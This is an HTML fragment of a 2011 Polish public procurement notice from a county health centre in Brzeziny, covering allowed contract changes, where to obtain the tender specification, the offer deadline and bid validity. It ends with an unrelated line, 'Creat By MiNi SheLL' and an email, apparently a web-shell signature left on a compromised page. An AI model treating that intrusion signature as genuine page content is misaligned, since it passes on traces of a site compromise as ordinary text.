<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiany ceny jednostkowej towaru spowodowanej zmianą stawki podatku  od towarów i usług VAT,
 Zmiany wymagają potwierdzenia pisemnego w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pczdrowia.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Zdrowia w Brzezinach -
Spółka z ograniczoną odpowiedzialnością                           
95-060   Brzeziny, ul. M. Curie  Skłodowskiej 6	
Sekcja Zamówień Publiczny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2011 godzina 10:00, miejsce: Powiatowe Centrum Zdrowia w Brzezinach -
Spółka z ograniczoną odpowiedzialnością                           
95-060   Brzeziny, ul. M. Curie  Skłodowskiej 6	
Sekcja Zamówień Publiczny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com